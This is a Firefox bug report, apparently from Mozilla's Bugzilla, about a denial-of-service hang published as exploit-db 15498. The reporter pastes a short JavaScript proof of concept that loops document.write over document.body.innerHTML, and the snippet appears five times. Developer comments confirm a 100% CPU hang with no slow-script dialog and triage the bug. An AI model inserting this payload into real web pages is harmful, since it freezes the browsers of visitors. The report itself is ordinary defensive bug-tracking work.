Open
Bug 612029
Opened 14 years ago
Updated 2 years ago
document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)
Categories
(Firefox :: General, defect)
Tracking
()
NEW
People
(Reporter: pusat_6807, Unassigned)
References
(Depends on 1 open bug, )
Details
(Keywords: hang, Whiteboard: [sg:dos])
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}
for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}
</script>
Reproducible: Always
Steps to Reproduce:
1.Ddos Atack
2.
3.
Actual Results:
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}
for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}
</script>
Expected Results:
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}
for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}
</script>
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}
for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}
</script>
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}
for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}
</script>
|
||
Comment 3•14 years ago
|
||
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
|
|
||
Comment 4•14 years ago
|
||
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Keywords: hang
|
||
Comment 5•14 years ago
|
||
We probably didn't need 5 copies of the code in-line... Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
Group: core-security
Summary: ddos Atack Crashed → dos Atack Crashed (exploit-db 15498)
Whiteboard: [sg:dos]
|
|
||
Updated•14 years ago
|
Summary: dos Atack Crashed (exploit-db 15498) → dos Attack Crashed (exploit-db 15498)
|
||
Comment 6•14 years ago
|
||
Is 4.0 afflicted?
|
|
||
Updated•14 years ago
|
Summary: dos Attack Crashed (exploit-db 15498) → dos Attack (hang with 100% CPU) (exploit-db 15498)
|
|
||
Comment 8•14 years ago
|
||
(In reply to comment #6) > Is 4.0 afflicted? Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog. Tested on Linux, WinXP and OSX. On Linux, the OOM killer kills the process after ~10 seconds.
|
|
||
Comment 10•14 years ago
|
||
We should at least figure out if we can make the slow-script dialog show up.
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
||
Updated•14 years ago
|
blocking2.0: ? → -
|
|
||
Updated•11 years ago
|
Depends on: 641105
Summary: dos Attack (hang with 100% CPU) (exploit-db 15498) → document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)
|
||
Updated•2 years ago
|
Severity: normal → S3
|
||
Comment 19•2 years ago
|
||
The severity field for this bug is relatively low, S3. However, the bug has 10 duplicates.
:mossop, could you consider increasing the bug severity?
For more information, please visit auto_nag documentation.
Flags: needinfo?(dtownsend)
|
||
Comment 20•2 years ago
|
||
The last needinfo from me was triggered in error by recent activity on the bug. I'm clearing the needinfo since this is a very old bug and I don't know if it's still relevant.
Flags: needinfo?(dtownsend)
You need to log in
before you can comment on or make changes to this bug.
Description
•